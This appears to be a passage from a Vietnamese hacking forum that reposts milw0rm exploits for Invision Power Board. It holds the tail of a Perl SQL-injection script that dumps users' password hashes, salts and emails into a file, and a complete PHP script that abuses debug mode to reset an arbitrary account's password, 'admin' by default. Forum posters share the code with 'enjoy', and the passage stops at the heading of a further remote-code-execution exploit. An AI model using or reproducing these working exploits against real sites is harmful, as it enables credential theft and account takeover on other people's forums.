$own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)==5) { $salt = $rep; $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)>0) { $email = $rep; print RES $id.":".$hash.":".$salt."::".$email."\n"; } } } } close(RES); print "[!] Query was successfully perfomed. Results are in txt files\r\n"; &footer(); $ex = <STDIN>; sub footer() { print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n"; print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n"; } sub header() { print q( * Invision Power Board 2.1.* Remote SQL Injecton Exploit * * Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) * * Coded by w4g.not null * * FOR EDUCATIONAL PURPOSES *ONLY* * ); } sub info() { print q( [i] Usage: perl w4gipb216.pl [server] [/dir/] where |- server - server, where IPB installed without http:// |- /dir/ - dir, where IPB installed or / for no dir e.g perl w4gipb216.pl someserver.com /forum/ [i] Stealing info about users (format id:pass:salt::email) [!] Need MySQL > 4.0 ); } sub query() { my($q,$server,$dir) = @_; $res = $ua- >get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP' =>"' ".$q); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } else { if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; } } } return $rep; } # milw0rm.com [2006-07-18] langtuhaohoa(HCE) Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit Trích: <?php /* Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software. */ // The forum's address up to and including 'index.php' $site = "http://localhost/forums/index.php"; // An existing user's login name $name = "admin"; // The new password(3-32 characters) $pass = "1234"; // You can use a proxy // $proxy = "1.2.3.4:8080"; // $site .= "?"; $suffix = ""; $name = urlencode($name); $pass = urlencode($pass); $curl = curl_init($site.'act=Reg&CODE=10'); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } else { $suffix = "&debug=1"; $curl = curl_init($site.'act=Reg&CODE=10'.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } } if (!isset($regid) || !isset($regcode)) { echo "Error: Probably not vulnerable, or no forum found"; exit; } $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid }&reg_code={$regcode}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } function change_pass($regcode,$regid,$vid,$userid) { global $site, $proxy, $name, $pass; $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={ $vid}&regid={$regid}&reg_code={$regcode}&pass1={$p ass}&pass2={$pass}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); echo "Password Changed!"; exit; } ?> # milw0rm.com [2006-11-01] enjoy nào anh em . Navaro(HCE) iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability Code: